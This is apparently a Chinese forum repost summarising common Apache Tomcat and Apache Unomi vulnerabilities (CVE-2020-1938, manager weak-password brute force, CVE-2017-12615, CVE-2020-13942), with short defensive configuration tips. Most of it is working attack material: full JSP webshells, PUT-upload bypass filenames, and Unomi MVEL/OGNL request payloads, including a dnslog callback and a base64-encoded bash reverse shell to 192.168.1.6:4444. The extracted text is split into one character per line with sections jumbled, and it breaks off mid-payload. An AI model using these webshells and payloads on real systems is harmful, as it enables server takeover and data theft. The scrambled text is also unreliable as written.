论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
漏洞
[194] 2021-03-28_Tomcat常见的漏洞总结
文档创建者:
s7ckTeam
浏览次数:
6
最后更新:
2025-01-16
漏洞
6 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前在线
积分
-56
6万
主题
-6万
回帖
-56
积分
管理员
积分
-56
发消息
2021-03-28_Tomcat常见的漏洞总结
T
o
m
c
a
t
常
见
的
漏
洞
总
结
x
i
a
o
A
d
m
i
n
T
e
a
m
2
0
2
1
-
0
3
-
2
8
T
o
m
c
a
t
常
见
漏
洞
常
见
漏
洞
漏
洞
汇
总
漏
洞
汇
总
C
V
E
-
2
0
2
0
-
1
9
3
8
文
件
包
含
漏
洞
文
件
包
含
漏
洞
漏
洞
描
述
漏
洞
描
述
该
漏
洞
是
由
于
T
o
m
c
a
t
A
J
P
协
议
存
在
缺
陷
而
导
致
,
攻
击
者
利
用
该
漏
洞
可
通
过
构
造
特
定
参
数
,
读
取
服
务
器
w
e
b
a
p
p
下
的
任
意
文
件
,
如
:
w
e
b
a
p
p
配
置
文
件
或
源
代
码
等
。
若
目
标
服
务
器
同
时
存
在
文
件
上
传
功
能
,
攻
击
者
可
进
一
步
实
现
远
程
代
码
执
行
。
漏
洞
影
响
版
本
漏
洞
影
响
版
本
不
受
影
响
版
本
不
受
影
响
版
本
漏
洞
分
析
漏
洞
分
析
T
o
m
c
a
t
在
处
理
a
j
p
协
议
时
存
在
漏
洞
,
可
通
过
调
用
r
e
q
u
e
s
t
.
s
e
t
A
t
t
r
i
b
u
t
e
为
T
o
m
c
a
t
设
置
任
意
r
e
q
u
e
s
t
属
性
。
复
现
发
现
T
o
m
c
a
t
a
j
p
协
议
存
在
w
e
b
目
录
下
任
意
文
件
读
取
漏
洞
以
及
J
S
P
文
件
包
含
漏
洞
。
当
a
j
p
U
R
I
设
置
为
非
j
s
p
路
径
时
,
T
o
m
c
a
t
会
调
用
D
e
f
a
u
l
t
S
e
r
v
l
e
t
处
理
,
此
时
会
导
致
w
e
b
目
录
任
意
文
件
读
取
漏
洞
。
当
a
j
p
U
R
I
设
置
为
j
s
p
路
径
时
,
T
o
m
c
a
t
会
调
用
J
s
p
S
e
r
v
l
e
t
处
理
,
此
时
会
导
致
J
S
P
文
件
包
含
漏
洞
漏
洞
复
现
漏
洞
复
现
1
.
使
用
n
m
a
p
扫
描
目
标
是
否
开
启
了
8
0
0
9
端
口
T
o
m
c
a
t
是
A
p
a
c
h
e
软
件
基
金
会
(
A
p
a
c
h
e
S
o
f
t
w
a
r
e
F
o
u
n
d
a
t
i
o
n
)
的
J
a
k
a
r
t
a
项
目
中
的
一
个
核
心
项
目
,
由
A
p
a
c
h
e
、
S
u
n
和
其
他
一
些
公
司
及
个
人
共
同
开
发
而
成
。
由
于
有
了
S
u
n
的
参
与
和
支
持
,
最
新
的
S
e
r
v
l
e
t
和
J
S
P
规
范
总
是
能
在
T
o
m
c
a
t
中
得
到
体
现
,
T
o
m
c
a
t
5
支
持
最
新
的
S
e
r
v
l
e
t
2
.
4
和
J
S
P
2
.
0
规
范
。
因
为
T
o
m
c
a
t
技
术
先
进
、
性
能
稳
定
,
而
且
免
费
,
因
而
深
受
J
a
v
a
爱
好
者
的
喜
爱
并
得
到
了
部
分
软
件
开
发
商
的
认
可
,
成
为
目
前
比
较
流
行
的
W
e
b
应
用
服
务
器
T
o
m
c
a
t
服
务
器
是
一
个
免
费
的
开
放
源
代
码
的
W
e
b
应
用
服
务
器
,
属
于
轻
量
级
应
用
服
务
器
,
在
中
小
型
系
统
和
并
发
访
问
用
户
不
是
很
多
的
场
合
下
被
普
遍
使
用
,
是
开
发
和
调
试
J
S
P
程
序
的
首
选
。
对
于
一
个
初
学
者
来
说
,
可
以
这
样
认
为
,
当
在
一
台
机
器
上
配
置
好
A
p
a
c
h
e
服
务
器
,
可
利
用
它
响
应
H
T
M
L
(
标
准
通
用
标
记
语
言
下
的
一
个
应
用
)
页
面
的
访
问
请
求
。
实
际
上
T
o
m
c
a
t
是
A
p
a
c
h
e
服
务
器
的
扩
展
,
但
运
行
时
它
是
独
立
运
行
的
,
所
以
当
你
运
行
t
o
m
c
a
t
时
,
它
实
际
上
作
为
一
个
与
A
p
a
c
h
e
独
立
的
进
程
单
独
运
行
的
A
p
a
c
h
e
T
o
m
c
a
t
6
A
p
a
c
h
e
T
o
m
c
a
t
7
<
7
.
0
.
1
0
0
A
p
a
c
h
e
T
o
m
c
a
t
8
<
8
.
5
.
5
1
A
p
a
c
h
e
T
o
m
c
a
t
9
<
9
.
0
.
3
1
A
p
a
c
h
e
T
o
m
c
a
t
=
7
.
0
.
1
0
0
A
p
a
c
h
e
T
o
m
c
a
t
=
8
.
5
.
5
1
A
p
a
c
h
e
T
o
m
c
a
t
=
9
.
0
.
3
1
2
.
使
用
p
o
c
扫
描
目
标
网
站
这
里
是
读
取
R
O
O
T
路
径
下
的
w
e
b
.
x
m
l
(
默
认
为
R
O
O
T
)
如
果
想
换
路
径
可
以
更
改
P
O
C
源
码
里
的
/
的
位
置
更
换
成
想
要
查
询
的
目
录
(
只
能
在
w
e
b
a
p
p
s
下
)
比
如
e
x
a
m
p
l
e
s
防
御
方
式
防
御
方
式
1
.
禁
用
A
J
P
协
议
,
在
t
o
m
c
a
t
安
装
路
径
中
找
到
/
c
o
n
f
/
s
e
r
v
e
r
.
x
m
l
文
件
,
删
除
或
注
释
下
面
这
行
代
码
:
<
C
o
n
n
e
c
t
o
r
p
o
r
t
=
"
8
0
0
9
"
p
r
o
t
o
c
o
l
=
"
A
J
P
/
1
.
3
"
r
e
d
i
r
e
c
t
P
o
r
t
=
"
8
4
4
3
"
/
>
2
.
升
级
到
t
o
m
c
a
t
最
新
版
本
3
.
配
置
s
e
c
r
e
t
来
设
置
A
J
P
协
议
的
认
证
凭
证
,
如
:
<
C
o
n
n
e
c
t
o
r
p
o
r
t
=
"
8
0
0
9
"
p
r
o
t
o
c
o
l
=
"
A
J
P
/
1
.
3
"
r
e
d
i
r
e
c
t
P
o
r
t
=
"
8
4
4
3
"
a
d
d
r
e
s
s
=
"
Y
O
U
R
_
T
O
M
C
A
T
_
I
P
_
A
D
D
R
E
S
S
"
s
e
c
r
e
t
=
"
Y
O
U
R
_
T
O
M
C
A
T
_
A
J
P
_
S
E
C
R
E
T
"
/
>
T
o
m
c
a
t
后
台
弱
口
令
漏
洞
后
台
弱
口
令
漏
洞
T
o
m
c
a
t
后
台
存
在
弱
口
令
,
进
入
网
站
后
点
击
登
录
然
后
使
用
b
u
r
p
进
行
爆
破
测
试
下
载
地
址
:
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
Y
D
H
C
U
I
/
C
N
V
D
-
2
0
2
0
-
1
0
4
8
7
-
T
o
m
c
a
t
-
A
j
p
-
l
f
i
可
以
发
现
账
户
密
码
是
利
用
A
u
t
h
o
r
i
z
a
t
i
o
n
该
授
权
字
段
以
b
a
s
e
6
4
方
式
传
递
账
户
信
息
的
发
现
加
密
方
式
后
,
拿
去
解
密
后
发
现
他
的
数
据
传
输
是
将
账
户
与
密
码
用
冒
号
进
行
组
合
之
后
在
用
b
a
s
e
6
4
加
密
所
传
递
的
。
构
造
字
段
进
行
爆
破
使
用
b
u
r
p
抓
包
后
发
送
到
I
n
t
r
u
d
e
模
块
进
行
暴
力
破
解
通
过
上
面
的
验
证
得
到
t
o
m
a
t
数
据
传
递
格
式
为
u
s
e
r
n
a
m
e
:
p
a
s
s
w
o
r
d
,
使
用
b
u
r
p
模
糊
测
试
模
块
中
的
c
u
s
t
o
m
i
t
e
a
c
t
o
r
自
定
义
迭
代
类
型
的
p
a
y
l
o
a
d
,
该
类
型
的
p
a
y
l
o
a
d
共
分
为
8
个
占
位
符
,
每
一
个
占
位
符
又
可
以
指
定
简
单
列
表
的
p
a
y
l
o
a
d
类
型
。
再
根
据
占
位
的
数
值
,
于
每
一
个
p
a
y
l
o
a
d
列
表
区
进
行
笛
卡
尔
积
生
成
集
合
组
简
单
理
解
就
是
简
单
理
解
就
是
:
设
置
占
位
符
,
利
用
数
学
中
的
笛
卡
尔
积
进
行
集
合
,
去
拼
凑
各
种
可
能
存
在
的
设
置
占
位
符
,
利
用
数
学
中
的
笛
卡
尔
积
进
行
集
合
,
去
拼
凑
各
种
可
能
存
在
的
p
a
y
l
o
a
d
可
能
列
表
可
能
列
表
设
置
格
式
如
下
:
按
照
p
a
y
l
o
a
d
类
型
进
行
设
置
P
o
s
i
t
i
o
n
参
数
,
比
如
我
们
要
爆
破
T
o
m
c
a
t
数
据
。
设
置
第
一
个
P
o
s
i
t
i
o
n
参
数
就
是
u
s
e
r
n
a
m
e
参
数
,
然
后
再
进
行
添
加
p
a
y
l
a
o
d
字
典
。
依
次
类
推
第
二
个
参
数
就
是
冒
号
:
,
第
三
个
就
是
p
a
s
s
w
o
r
d
字
段
。
设
置
完
成
后
再
对
数
据
字
段
进
行
b
a
s
e
6
4
编
码
就
可
以
进
行
爆
破
。
设
置
方
法
如
下
:
以
上
就
是
t
o
m
c
a
t
基
础
认
证
爆
破
,
当
然
我
们
还
可
以
去
自
己
收
集
匹
配
号
的
三
个
字
段
字
典
或
者
b
a
s
e
6
4
加
密
过
的
字
典
以
及
m
e
t
a
s
p
l
o
i
t
中
的
t
o
m
c
a
t
爆
破
,
更
加
方
便
进
行
爆
破
成
功
爆
破
出
账
号
密
码
,
然
后
使
用
b
a
s
e
6
4
解
码
得
出
明
文
账
号
密
码
使
用
爆
破
出
的
账
号
密
码
登
录
进
去
后
台
后
发
现
有
一
个
上
传
页
面
,
直
接
上
传
一
个
w
a
r
木
马
就
可
以
w
a
r
木
马
的
制
作
过
程
木
马
的
制
作
过
程
1
.
找
到
一
个
j
s
p
的
木
马
<
%
i
f
(
"
0
2
3
"
.
e
q
u
a
l
s
(
r
e
q
u
e
s
t
.
g
e
t
P
a
r
a
m
e
t
e
r
(
"
p
w
d
"
)
)
)
{
j
a
v
a
.
i
o
.
I
n
p
u
t
S
t
r
e
a
m
i
n
=
R
u
n
t
i
m
e
.
g
e
t
R
u
n
t
i
m
e
(
)
.
e
x
e
c
(
r
e
q
u
e
s
t
.
g
e
t
P
a
r
a
m
e
t
e
r
(
"
i
"
)
)
.
g
e
t
I
n
p
u
t
S
t
r
e
a
m
(
)
;
2
.
将
s
p
木
马
放
入
j
d
k
1
.
8
.
0
_
7
3
b
i
n
目
录
下
,
然
后
在
c
m
d
输
出
已
下
命
令
(
注
意
是
必
须
在
j
a
v
a
环
境
下
的
,
必
须
使
用
管
理
员
权
限
的
)
木
马
制
作
成
功
上
传
制
作
的
上
传
制
作
的
w
a
r
木
马
木
马
可
以
看
到
已
经
成
功
上
传
了
木
马
访
问
上
传
的
1
.
j
s
p
目
录
然
后
就
可
以
执
行
我
们
想
要
执
行
的
系
统
命
令
C
V
E
-
2
0
1
7
-
1
2
6
1
5
T
o
m
c
a
t
远
程
代
码
执
行
漏
洞
远
程
代
码
执
行
漏
洞
(
P
U
T
请
求
请
求
)
漏
洞
介
绍
漏
洞
介
绍
远
程
代
码
执
行
漏
洞
(
C
V
E
-
2
0
1
7
-
1
2
6
1
5
)
影
响
:
A
p
a
c
h
e
T
o
m
c
a
t
7
.
0
.
0
-
7
.
0
.
7
9
(
7
.
0
.
8
1
修
复
不
完
全
)
当
T
o
m
c
a
t
运
行
在
W
i
n
d
o
w
s
主
机
上
,
且
启
用
了
H
T
T
P
P
U
T
请
求
方
法
,
攻
击
者
通
过
构
造
的
攻
击
请
求
向
服
务
器
上
传
包
含
任
意
代
码
的
J
S
P
文
件
,
造
成
任
意
代
码
执
行
,
危
害
十
分
严
重
影
响
版
本
影
响
版
本
A
p
a
c
h
e
T
o
m
c
a
t
7
.
0
.
0
-
7
.
0
.
8
1
i
n
t
a
=
-
1
;
b
y
t
e
[
]
b
=
n
e
w
b
y
t
e
[
2
0
4
8
]
;
o
u
t
.
p
r
i
n
t
(
"
<
p
r
e
>
"
)
;
w
h
i
l
e
(
(
a
=
i
n
.
r
e
a
d
(
b
)
)
!
=
-
1
)
{
o
u
t
.
p
r
i
n
t
l
n
(
n
e
w
S
t
r
i
n
g
(
b
)
)
;
}
o
u
t
.
p
r
i
n
t
(
"
<
/
p
r
e
>
"
)
;
}
%
>
j
a
r
c
v
f
+
部
署
的
w
a
r
木
马
+
自
己
b
i
n
目
录
下
的
j
s
p
木
马
漏
洞
利
用
前
提
漏
洞
利
用
前
提
:
需
T
o
m
c
a
t
开
启
了
H
T
T
P
P
U
T
请
求
漏
洞
原
理
分
析
漏
洞
原
理
分
析
T
o
m
c
a
t
的
S
e
r
v
l
e
t
是
在
c
o
n
f
/
w
e
b
.
x
m
l
配
置
的
,
通
过
配
置
文
件
可
知
,
当
后
缀
名
为
.
j
s
p
和
.
j
s
p
x
的
时
候
,
是
通
过
J
s
p
S
e
r
v
l
e
t
处
理
请
求
的
:
而
其
他
的
静
态
文
件
是
通
过
D
e
f
a
u
l
t
S
e
r
v
l
e
t
处
理
的
:
可
以
得
知
,
“
1
.
j
s
p
”
(
末
尾
有
一
个
和
空
格
)
并
不
能
匹
配
到
J
s
p
S
e
r
v
l
e
t
,
而
是
会
交
由
D
e
f
a
u
l
t
S
e
r
v
l
e
t
去
处
理
。
当
处
理
P
U
T
请
求
时
:
会
调
用
r
e
s
o
u
r
c
e
s
.
b
i
n
d
:
d
i
r
C
o
n
t
e
x
t
为
F
i
l
e
D
i
r
C
o
n
t
e
x
t
:
调
用
r
e
b
i
n
d
创
建
文
件
:
又
由
于
W
i
n
d
o
w
s
不
允
许
“
”
作
为
文
件
名
结
尾
,
所
以
会
创
建
一
个
.
j
s
p
文
件
,
导
致
代
码
执
行
。
环
境
搭
建
环
境
搭
建
下
载
T
o
m
c
a
t
,
安
装
成
功
后
,
需
要
开
启
H
T
T
P
P
U
T
请
求
,
首
先
打
开
T
o
m
c
a
t
目
录
,
找
到
配
置
文
件
打
开
之
后
,
寻
找
r
e
a
d
o
n
l
y
,
如
图
,
他
被
禁
用
了
,
禁
止
P
U
T
上
传
:
找
到
o
r
g
.
a
p
a
c
h
e
.
c
a
t
a
l
i
n
a
.
s
e
r
v
l
e
t
s
.
D
e
f
a
u
l
t
S
e
r
v
l
e
t
方
法
,
并
添
加
以
下
命
令
,
添
加
成
功
后
重
启
一
下
即
可
漏
洞
复
现
漏
洞
复
现
1
.
使
用
b
u
r
p
进
行
抓
包
,
将
请
求
包
发
送
到
r
e
p
e
a
t
e
r
模
块
中
,
将
G
E
T
请
求
方
法
改
为
O
P
T
I
O
N
S
,
查
看
请
求
方
法
2
.
发
现
启
用
了
P
U
T
方
法
,
使
用
P
U
T
请
求
上
传
j
s
p
木
马
<
i
n
i
t
-
p
a
r
a
m
>
<
p
a
r
a
m
-
n
a
m
e
>
r
e
a
d
o
n
l
y
<
/
p
a
r
a
m
-
n
a
m
e
>
<
p
a
r
a
m
-
v
a
l
u
e
>
f
a
l
s
e
<
/
p
a
r
a
m
-
v
a
l
u
e
>
<
/
i
n
i
t
-
p
a
r
a
m
>
j
s
p
马
:
<
%
@
p
a
g
e
l
a
n
g
u
a
g
e
=
"
j
a
v
a
"
i
m
p
o
r
t
=
"
j
a
v
a
.
u
t
i
l
.
*
,
j
a
v
a
.
i
o
.
*
"
p
a
g
e
E
n
c
o
d
i
n
g
=
"
U
T
F
-
8
"
%
>
<
%
!
p
u
b
l
i
c
s
t
a
t
i
c
S
t
r
i
n
g
e
x
c
u
t
e
C
m
d
(
S
t
r
i
n
g
c
)
{
S
t
r
i
n
g
B
u
i
l
d
e
r
l
i
n
e
=
n
e
w
S
t
r
i
n
g
B
u
i
l
d
e
r
(
)
;
t
r
y
{
P
r
o
c
e
s
s
p
r
o
=
R
u
n
t
i
m
e
.
g
e
t
R
u
n
t
i
m
e
(
)
.
e
x
e
c
(
c
)
;
B
u
f
f
e
r
e
d
R
e
a
d
e
r
b
u
f
=
n
e
w
B
u
f
f
e
r
e
d
R
e
a
d
e
r
(
n
e
w
I
n
p
u
t
S
t
r
e
a
m
R
e
a
d
e
r
(
p
r
o
.
g
e
t
I
n
p
u
t
S
t
r
e
a
m
(
)
)
)
;
3
.
页
面
状
态
码
返
回
2
0
1
,
表
示
木
马
写
入
成
功
4
.
到
页
面
中
访
问
(
i
p
+
1
.
j
s
p
)
u
r
l
:
h
t
t
p
:
/
/
2
1
9
.
1
5
3
.
4
9
.
2
2
8
:
4
7
1
9
5
/
s
h
e
l
l
.
j
s
p
?
c
m
d
=
l
s
%
2
0
/
&
p
w
d
=
0
2
3
5
.
该
漏
洞
实
际
上
是
利
用
了
该
漏
洞
实
际
上
是
利
用
了
w
i
n
d
o
w
下
文
件
名
解
析
的
漏
洞
来
触
发
的
下
文
件
名
解
析
的
漏
洞
来
触
发
的
。
通
过
构
造
特
殊
后
缀
名
,
绕
过
T
o
m
c
a
t
检
测
,
让
T
o
m
c
a
t
用
D
e
f
a
u
l
t
S
e
r
v
l
e
t
的
逻
辑
处
理
请
求
,
从
而
上
传
j
s
p
w
e
b
s
h
e
l
l
文
件
有
三
种
方
法
可
以
进
行
绕
过
1
s
h
e
l
l
.
j
s
p
%
2
0
2
s
h
e
l
l
.
j
s
p
:
:
$
D
A
T
A
3
s
h
e
l
l
.
j
s
p
/
C
V
E
-
2
0
2
0
-
1
3
9
4
2
A
p
a
c
h
e
U
n
o
m
i
远
程
代
码
执
行
漏
洞
远
程
代
码
执
行
漏
洞
A
p
a
c
h
e
U
n
o
m
i
简
介
简
介
A
p
a
c
h
e
U
n
o
m
i
是
一
个
基
于
标
准
的
客
户
/
数
据
平
台
(
C
D
P
,
C
u
s
t
o
m
e
r
D
a
t
a
P
l
a
t
f
o
r
m
)
,
用
于
管
理
在
线
客
户
和
访
客
等
信
息
,
以
提
供
符
合
访
客
隐
私
规
则
的
个
性
化
体
验
,
比
如
G
D
P
R
和
“
不
跟
踪
”
偏
好
设
置
。
其
最
初
于
J
a
h
i
a
开
发
,
2
0
1
5
年
1
0
月
提
交
给
了
A
p
a
c
h
e
孵
化
器
。
A
p
a
c
h
e
U
n
o
m
i
具
有
隐
私
管
理
、
用
户
/
事
件
/
目
标
跟
踪
、
报
告
、
访
客
资
料
管
理
、
细
分
、
角
色
、
A
/
B
测
试
等
功
能
,
它
可
以
作
为
:
Ø
W
e
b
C
M
S
个
性
化
服
务
Ø
原
生
移
动
应
用
的
分
析
服
务
Ø
具
有
分
段
功
能
的
集
中
配
置
文
件
管
理
系
统
Ø
授
权
管
理
中
心
漏
洞
描
述
漏
洞
描
述
A
p
a
c
h
e
U
n
o
m
i
是
一
个
基
于
标
准
的
客
户
数
据
平
台
(
C
D
P
,
C
u
s
t
o
m
e
r
D
a
t
a
P
l
a
t
f
o
r
m
)
,
用
于
管
理
在
线
客
户
和
访
客
等
信
息
,
以
提
供
符
合
访
客
隐
私
规
则
的
个
性
化
体
验
,
比
如
G
D
P
R
和
“
不
跟
踪
”
偏
好
设
置
。
其
最
初
于
J
a
h
i
a
开
发
,
2
0
1
5
年
1
0
月
U
n
o
m
i
成
为
A
p
a
c
h
e
软
件
基
金
会
项
目
。
在
A
p
a
c
h
e
U
n
o
m
i
1
.
5
.
1
版
本
之
前
,
攻
击
者
可
以
通
过
精
心
构
造
的
M
V
E
L
或
O
N
G
l
表
达
式
来
发
送
恶
意
请
求
,
使
得
U
n
o
m
i
服
务
器
执
行
任
意
代
码
,
漏
洞
对
应
编
号
为
C
V
E
-
2
0
2
0
-
1
1
9
7
5
,
而
C
V
E
-
2
0
2
0
-
1
3
9
4
2
漏
洞
是
对
C
V
E
-
2
0
2
0
-
1
1
9
7
5
漏
洞
的
补
丁
绕
过
,
攻
击
者
绕
过
补
丁
检
测
的
黑
名
单
,
发
送
恶
意
请
求
,
在
服
务
器
执
行
任
意
代
码
漏
洞
影
响
版
本
漏
洞
影
响
版
本
A
p
a
c
h
e
U
n
o
m
i
<
1
.
5
.
2
环
境
搭
建
环
境
搭
建
使
用
d
o
c
k
e
r
一
键
搭
建
的
v
u
l
h
u
b
靶
场
,
访
问
页
面
i
p
:
8
1
8
1
通
过
8
1
8
1
和
9
4
4
3
两
个
端
口
都
可
以
触
发
漏
洞
,
本
次
使
用
8
1
8
1
端
口
进
行
漏
洞
复
现
S
t
r
i
n
g
t
e
m
p
=
n
u
l
l
;
w
h
i
l
e
(
(
t
e
m
p
=
b
u
f
.
r
e
a
d
L
i
n
e
(
)
)
!
=
n
u
l
l
)
{
l
i
n
e
.
a
p
p
e
n
d
(
t
e
m
p
+
"
n
"
)
;
}
b
u
f
.
c
l
o
s
e
(
)
;
}
c
a
t
c
h
(
E
x
c
e
p
t
i
o
n
e
)
{
l
i
n
e
.
a
p
p
e
n
d
(
e
.
g
e
t
M
e
s
s
a
g
e
(
)
)
;
}
r
e
t
u
r
n
l
i
n
e
.
t
o
S
t
r
i
n
g
(
)
;
}
%
>
<
%
i
f
(
"
0
2
3
"
.
e
q
u
a
l
s
(
r
e
q
u
e
s
t
.
g
e
t
P
a
r
a
m
e
t
e
r
(
"
p
w
d
"
)
)
&
&
!
"
"
.
e
q
u
a
l
s
(
r
e
q
u
e
s
t
.
g
e
t
P
a
r
a
m
e
t
e
r
(
"
c
m
d
"
)
)
)
{
o
u
t
.
p
r
i
n
t
l
n
(
"
<
p
r
e
>
"
+
e
x
c
u
t
e
C
m
d
(
r
e
q
u
e
s
t
.
g
e
t
P
a
r
a
m
e
t
e
r
(
"
c
m
d
"
)
)
+
"
<
/
p
r
e
>
"
)
;
}
e
l
s
e
{
o
u
t
.
p
r
i
n
t
l
n
(
"
:
-
)
"
)
;
}
%
>
漏
洞
复
现
漏
洞
复
现
1
.
打
开
靶
场
首
页
,
使
用
b
p
进
行
抓
包
,
发
送
到
R
e
p
e
a
t
e
r
模
块
构
造
数
据
包
2
.
将
G
E
T
请
求
改
为
P
O
S
T
请
求
,
删
除
多
余
的
字
段
,
保
留
H
O
S
T
,
U
s
e
r
-
A
g
e
n
t
和
C
o
n
t
e
n
t
-
L
e
n
g
t
h
字
段
,
然
后
添
加
以
下
数
据
,
将
d
n
s
l
o
g
换
为
自
己
的
地
址
,
然
后
发
送
数
据
包
P
O
S
T
/
c
o
n
t
e
x
t
.
j
s
o
n
H
T
T
P
/
1
.
1
H
o
s
t
:
目
标
地
址
:
8
1
8
1
U
s
e
r
-
A
g
e
n
t
:
M
o
z
i
l
l
a
/
5
.
0
(
W
i
n
d
o
w
s
N
T
1
0
.
0
;
W
i
n
6
4
;
x
6
4
)
A
p
p
l
e
W
e
b
K
i
t
/
5
3
7
.
3
6
(
K
H
T
M
L
,
l
i
k
e
G
e
c
k
o
)
C
h
r
o
m
e
/
8
6
.
0
.
4
2
4
0
.
1
9
8
S
a
f
a
r
i
/
5
3
7
.
3
6
C
o
n
t
e
n
t
-
L
e
n
g
t
h
:
4
9
5
{
"
f
i
l
t
e
r
s
"
:
[
{
"
i
d
"
:
"
b
o
o
m
"
,
"
f
i
l
t
e
r
s
"
:
[
{
"
c
o
n
d
i
t
i
o
n
"
:
{
"
p
a
r
a
m
e
t
e
r
V
a
l
u
e
s
"
:
{
"
t
e
s
t
"
:
"
s
c
r
i
p
t
:
:
R
u
n
t
i
m
e
r
=
R
u
n
t
i
m
e
.
g
e
t
R
u
n
t
i
m
e
(
)
;
r
.
e
x
e
c
(
"
p
i
n
g
b
r
9
y
b
9
.
d
n
s
l
o
g
.
c
n
"
)
;
"
}
,
"
t
y
p
e
"
:
"
p
r
o
f
i
l
e
P
r
o
p
e
r
t
y
C
o
n
d
i
t
i
o
n
"
}
}
]
}
]
,
"
s
e
s
s
i
o
n
I
d
"
:
"
t
e
s
t
"
}
3
.
可
以
使
用
此
漏
洞
来
反
弹
s
h
e
l
l
,
将
b
a
s
h
反
弹
s
h
e
l
l
的
命
令
进
行
编
码
,
编
码
在
线
地
址
为
(
h
t
t
p
:
/
/
w
w
w
.
j
a
c
k
s
o
n
-
t
.
c
a
/
r
u
n
t
i
m
e
-
e
x
e
c
-
p
a
y
l
o
a
d
s
.
h
t
m
l
)
4
.
将
编
码
后
的
s
h
e
l
l
添
加
到
以
下
p
o
c
的
执
行
系
统
命
令
的
地
方
(
)
成
功
反
弹
s
h
e
l
l
b
a
s
h
-
i
>
&
/
d
e
v
/
t
c
p
/
1
9
2
.
1
6
8
.
1
.
6
/
4
4
4
4
0
>
&
1
编
码
后
为
b
a
s
h
-
c
{
e
c
h
o
,
Y
m
F
z
a
C
A
t
a
S
A
+
J
i
A
v
Z
G
V
2
L
3
R
j
c
C
8
x
O
T
I
u
M
T
Y
4
L
j
E
u
N
i
8
0
N
D
Q
0
I
D
A
+
J
j
E
=
}
|
{
b
a
s
e
6
4
,
-
d
}
|
{
b
a
s
h
,
-
i
}
P
O
S
T
/
c
o
n
t
e
x
t
.
j
s
o
n
H
T
T
P
/
1
.
1
H
o
s
t
:
l
o
c
a
l
h
o
s
t
:
8
1
8
1
A
c
c
e
p
t
-
E
n
c
o
d
i
n
g
:
g
z
i
p
,
d
e
f
l
a
t
e
A
c
c
e
p
t
:
*
/
*
A
c
c
e
p
t
-
L
a
n
g
u
a
g
e
:
e
n
U
s
e
r
-
A
g
e
n
t
:
M
o
z
i
l
l
a
/
5
.
0
(
W
i
n
d
o
w
s
N
T
1
0
.
0
;
W
i
n
6
4
;
x
6
4
)
A
p
p
l
e
W
e
b
K
i
t
/
5
3
7
.
3
6
(
K
H
T
M
L
,
l
i
k
e
G
e
c
k
o
)
C
h
r
o
m
e
/
8
0
.
0
.
3
9
8
7
.
1
3
2
S
a
f
a
r
i
/
5
3
7
.
3
6
C
o
n
n
e
c
t
i
o
n
:
c
l
o
s
e
C
o
n
t
e
n
t
-
T
y
p
e
:
a
p
p
l
i
c
a
t
i
o
n
/
j
s
o
n
C
o
n
t
e
n
t
-
L
e
n
g
t
h
:
4
8
3
{
"
f
i
l
t
e
r
s
"
:
[
{
"
i
d
"
:
"
s
a
m
p
l
e
"
,
"
f
i
l
t
e
r
s
"
:
[
{
"
c
o
n
d
i
t
i
o
n
"
:
{
"
p
a
r
a
m
e
t
e
r
V
a
l
u
e
s
"
:
{
"
"
:
"
s
c
r
i
p
t
:
:
R
u
n
t
i
m
e
r
=
R
u
n
t
i
m
e
.
g
e
t
R
u
n
t
i
m
e
(
)
;
r
.
e
x
e
c
(
"
b
a
s
h
-
c
{
e
c
h
o
,
Y
m
F
z
a
C
A
t
a
S
A
+
J
i
A
v
Z
G
V
2
L
3
R
j
c
C
8
x
O
T
I
u
M
T
Y
4
L
j
E
u
N
i
8
0
N
D
Q
0
I
D
A
+
J
j
E
=
}
|
{
b
a
s
e
6
4
,
-
d
}
|
{
b
a
s
h
,
-
i
}
"
)
;
"
}
,
"
t
y
p
e
"
:
"
p
r
o
f
i
l
e
P
r
o
p
e
r
t
y
C
o
n
d
i
t
i
o
n
"
}
}
]
}
]
,
"
s
e
s
s
i
o
n
I
d
"
:
"
s
a
m
p
l
e
"
}
上
面
使
用
的
是
通
过
上
面
使
用
的
是
通
过
M
V
E
L
表
达
式
执
行
任
意
命
令
,
以
下
使
用
表
达
式
执
行
任
意
命
令
,
以
下
使
用
O
G
N
L
表
达
式
执
行
任
意
命
令
表
达
式
执
行
任
意
命
令
在
漏
洞
首
页
抓
取
请
求
包
然
后
发
送
到
R
e
p
e
a
t
e
r
模
块
中
构
造
数
据
包
,
构
造
的
p
o
c
为
P
O
S
T
/
c
o
n
t
e
x
t
.
j
s
o
n
H
T
T
P
/
1
.
1
H
o
s
t
:
l
o
c
a
l
h
o
s
t
:
8
1
8
1
A
c
c
e
p
t
-
E
n
c
o
d
i
n
g
:
g
z
i
p
,
d
e
f
l
a
t
e
A
c
c
e
p
t
:
*
/
*
A
c
c
e
p
t
-
L
a
n
g
u
a
g
e
:
e
n
U
s
e
r
-
A
g
e
n
t
:
M
o
z
i
l
l
a
/
5
.
0
(
W
i
n
d
o
w
s
N
T
1
0
.
0
;
W
i
n
6
4
;
x
6
4
)
A
p
p
l
e
W
e
b
K
i
t
/
5
3
7
.
3
6
(
K
H
T
M
L
,
l
i
k
e
G
e
c
k
o
)
C
h
r
o
m
e
/
8
0
.
0
.
3
9
8
7
.
1
3
2
S
a
f
a
r
i
/
5
3
7
.
3
6
C
o
n
n
e
c
t
i
o
n
:
c
l
o
s
e
C
o
n
t
e
n
t
-
T
y
p
e
:
a
p
p
l
i
c
a
t
i
o
n
/
j
s
o
n
C
o
n
t
e
n
t
-
L
e
n
g
t
h
:
1
0
6
4
{
"
p
e
r
s
o
n
a
l
i
z
a
t
i
o
n
s
"
:
[
{
"
i
d
"
:
"
g
e
n
d
e
r
-
t
e
s
t
"
,
"
s
t
r
a
t
e
g
y
"
:
"
m
a
t
c
h
i
n
g
-
f
i
r
s
t
"
,
"
s
t
r
a
t
e
g
y
O
p
t
i
o
n
s
"
:
{
"
f
a
l
l
b
a
c
k
"
:
"
v
a
r
2
"
}
,
"
c
o
n
t
e
n
t
s
"
:
[
{
"
f
i
l
t
e
r
s
"
:
[
{
"
c
o
n
d
i
t
i
o
n
"
:
{
"
p
a
r
a
m
e
t
e
r
V
a
l
u
e
s
"
:
{
"
p
r
o
p
e
r
t
y
N
a
m
e
"
:
"
(
#
r
u
n
t
i
m
e
c
l
a
s
s
=
#
t
h
i
s
.
g
e
t
C
l
a
s
s
(
)
.
f
o
r
N
a
m
e
(
"
j
a
v
a
.
l
a
n
g
.
R
u
n
t
i
m
e
"
)
)
.
(
#
g
e
t
r
u
n
t
i
m
e
m
e
t
h
o
d
=
#
r
u
n
t
i
m
e
